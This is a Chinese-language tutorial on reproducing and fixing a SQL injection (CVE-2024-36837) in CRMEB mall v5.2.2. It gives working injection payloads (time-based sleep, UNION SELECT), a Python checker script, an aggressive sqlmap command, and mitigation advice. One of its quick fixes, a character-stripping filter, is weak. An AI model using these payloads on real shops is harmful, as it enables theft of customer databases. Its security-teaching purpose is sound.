CRMEB商城v5.2.2漏洞实战:手把手教你复现SQL注入(附POC脚本)
CRMEB商城SQL注入漏洞深度解析与实战复现指南
漏洞背景与影响范围
CRMEB作为国内广泛使用的开源电商系统,其5.2.2版本中曝光的SQL注入漏洞(CVE-2024-36837)引起了安全社区的广泛关注。这个漏洞位于ProductController.php文件的getProductList方法中,攻击者无需认证即可通过精心构造的HTTP请求获取数据库敏感信息。
根据漏洞披露信息,受影响的系统特征包括:
- 版本号:v5.2.2及部分早期版本
- 关键文件:
app/controller/ProductController.php - 漏洞函数:
getProductList() - 风险等级:高危(CVSS评分8.1)
漏洞原理与技术分析
SQL注入点定位
漏洞核心在于对selectId参数未进行充分过滤就直接拼接到SQL查询语句中。观察以下典型请求:
GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=) HTTP/1.1系统后端处理时,代码可能类似:
$selectId = $_GET['selectId']; $sql = "SELECT * FROM products WHERE id IN ($selectId) ORDER BY sales";当攻击者输入)闭合IN语句的括号后,可以注入任意SQL代码。更危险的是,这个注入点位于ORDER BY之前,使得攻击者可以完全控制查询逻辑。
漏洞利用技术细节
攻击者可以通过时间盲注技术探测数据库信息。例如:
GET /api/products?limit=20&selectId=0*if(now()=sysdate(),sleep(6),0) HTTP/1.1这个payload的工作原理:
0*确保原始查询语法正确if()函数判断条件是否成立sleep(6)作为可观测的延时效果- 整个表达式不影响查询结果但泄露信息
实战复现环境搭建
实验环境准备
推荐使用以下配置进行安全测试:
- 虚拟机:VirtualBox 6.1+
- 操作系统:Ubuntu 20.04 LTS
- 环境组件:
- PHP 7.4
- MySQL 5.7
- Nginx 1.18
安装CRMEB v5.2.2的步骤:
wget https://github.com/crmeb/CRMEB/archive/refs/tags/v5.2.2.zip unzip v5.2.2.zip cd CRMEB-5.2.2 chmod -R 755 public uploads runtime漏洞验证脚本
以下是改进版的Python检测脚本,增加更多检测维度:
import requests import time def check_vuln(url): test_cases = [ ("basic", "/api/products?selectId=)", "PDOConnection.php"), ("timebased", "/api/products?selectId=0*if(1=1,sleep(5),0)", 5) ] for case in test_cases: try: start = time.time() r = requests.get(url + case[1], timeout=10) elapsed = time.time() - start if case[0] == "basic": if case[2] in r.text: return True elif case[0] == "timebased": if elapsed >= case[2]: return True except: continue return False漏洞利用实战演示
信息泄露利用
通过联合查询可以提取数据库信息:
GET /api/products?selectId=1) UNION SELECT 1,version(),3,4,5,6,7,8,9-- - HTTP/1.1典型响应可能包含:
- MySQL版本信息
- 数据库名称
- 表结构信息
自动化利用工具
使用以下SQLmap命令进行自动化测试:
sqlmap -u "http://target/api/products?limit=20&selectId=1" \ --risk=3 --level=5 \ --batch --dbms=mysql \ --technique=T重要参数说明:
--risk=3:启用危险测试--level=5:最大检测强度--technique=T:专注时间盲注
防御方案与修复建议
临时缓解措施
在官方补丁发布前,建议:
- 在Nginx配置中添加规则拦截恶意请求:
location ~* /api/products { if ($args ~* "selectId=.*[)'\"]") { return 403; } }- 修改控制器代码,添加参数过滤:
$selectId = str_replace([')', '(', "'", '"'], '', $_GET['selectId']);长期解决方案
- 升级到最新版本:CRMEB团队已在后续版本修复此漏洞
- 使用预处理语句:改造所有SQL查询使用PDO预处理
- 输入验证:对所有用户输入实施严格的白名单验证
- WAF部署:配置Web应用防火墙规则拦截SQL注入尝试
企业安全防护体系建议
针对电商系统的安全防护,建议建立多层防御:
| 防护层级 | 具体措施 | 实施要点 |
|---|---|---|
| 代码层 | 安全编码规范 | 输入验证、输出编码、预处理语句 |
| 系统层 | 服务器加固 | 最小权限原则、定期更新补丁 |
| 网络层 | WAF配置 | SQL注入规则、速率限制 |
| 监控层 | 日志审计 | 异常请求监控、实时告警 |
特别提醒开发团队:
- 定期进行代码安全审计
- 建立漏洞响应流程
- 对第三方组件保持版本更新
- 实施持续的安全培训计划
在实际项目中,我们发现很多SQL注入漏洞都源于看似无害的排序、分页参数。建议开发团队特别关注这些边界点的安全处理。